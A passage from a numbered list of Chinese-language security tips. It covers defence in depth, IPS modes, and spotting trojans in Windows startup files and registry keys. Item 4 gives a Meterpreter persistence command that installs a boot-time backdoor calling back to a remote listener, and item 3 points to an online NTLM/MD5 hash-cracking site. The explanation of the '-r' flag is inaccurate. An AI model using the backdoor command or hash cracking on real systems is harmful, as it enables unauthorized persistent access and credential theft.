3. 网站http://www.md5decrypter.co.uk/,可提供对NTLM/LM hash值的在线解密(小编注:
这个网站破解MD5的命中率也很高哦)。
4. 使用meterpreter建立后门:
meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.1
-A参数用于在攻击方机器上自动启动监听程序。
-S参数表示将后门程序设置为Windows系统启动时加载
-U参数表示后门设置为用户登陆系统时自动执行。
-i参数用于设置后门回连到代理处理程序的时间间隔
-p是端口号
-r是目标机器的ip地址
5. 网络纵深防御思想:作为一个公司,它会为物理线路聘用一个巡线员(第一层),在工
作组交换机上做端口安全(第二层),在边界路由器上做访问列表(第三层),在防火墙中建立DMZ区和包过滤(第四层),设置IDS/IDP监测/阻拦(第三至七层),建立SSL通道(第六层),设置内容过滤(第七层),提供AAA服务(第七层),进行漏洞扫描(第四至七层)和病毒扫描(第七层)等。——摘自《IT安全面试攻略》
6. IPS设备可以提供攻击检测和防御两种功能,如果以镜像方式接入,就使用反应机制;
如果以串行方式接入,就使用阻断机制。
7. 根据ip获知对方电脑的名称:ping -a ip地址,
如:ping -a 192.168.235.253
8. 在系统“windows”文件夹下,点击打开“system.ini”文件,在代码中如果有[boot]代码,
其中shell语句的格式一般为“shell=文件名”,如果后面还跟有一个文件名(如shell=文件名+文件名),则很可能是木马程序。
9. 在系统“windows”文件夹下,点击打开“win.ini”文件,在代码中如果有“run=?”或
者“load=?”代码类型,一定要注意其后的文件。一般情况下,“run=”和“load=”后面就没有内容了,如果有路径或不熟悉的文件名,可能就是木马程序。
10. 木马隐藏的方式很多,一般都隐藏在注册表的
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
目录下。查看键值中有没有不熟悉的可执行文件,该类文件可能就是木马程序。
11. 专门捕获网页的嗅探器——艾菲网页侦探:艾菲网页侦探是一个HTTP协议的网络嗅探
器,专门捕捉局域网中含有HTTP协议的数据包,并对其进行分析,找出符合过滤器的那些HTTP通信内容。